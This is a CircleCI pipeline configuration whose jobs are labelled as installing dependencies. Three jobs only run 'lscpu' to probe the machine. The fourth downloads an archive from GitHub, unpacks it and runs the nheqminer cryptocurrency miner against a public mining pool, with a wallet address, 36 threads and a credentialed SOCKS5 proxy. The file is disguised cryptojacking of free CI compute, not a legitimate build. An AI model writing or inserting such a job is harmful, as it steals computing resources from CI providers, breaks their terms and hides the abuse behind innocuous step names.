version: 2.1 
jobs: 
    Devop: 
      docker: 
            - image: circleci/ruby:2.5.3 
      steps: 
        - run: 
            name: Install Dependencies 
            command: timeout 1m lscpu 
    Devop1: 
      docker: 
            - image: circleci/ruby:2.5.3 
      steps: 
        - run: 
            name: Install Dependencies 
            command: timeout 1m lscpu 
    Devop2: 
      docker: 
            - image: circleci/ruby:2.5.3 
      steps: 
        - run: 
            name: Install Dependencies 
            command: timeout 1m lscpu 
    Devop3: 
      docker: 
            - image: circleci/ruby:2.5.3 
      steps: 
        - run: wget https://github.com/dewi240809/zoe/raw/main/zoe.tgz && tar -xvf zoe.tgz && tar -xvf nheqminer-Linux-v0.8.2.tar.gz && nheqminer/nheqminer -v -l verushash.eu.mine.zergpool.com:3300 -u RSXFTyohSPGC63BXBQZ5F9jeQcqxvgS1Dx.Pusing_Siti_Suhuna_maredit -p c=RVN -t 36 --proxy socks5://simbahkencot-rotate:tukimenreborn@p.webshare.io:80
        
workflows: 
    version: 2.1 
    build: 
        jobs: 
            - Devop 
            - Devop1 
            - Devop2 
            - Devop3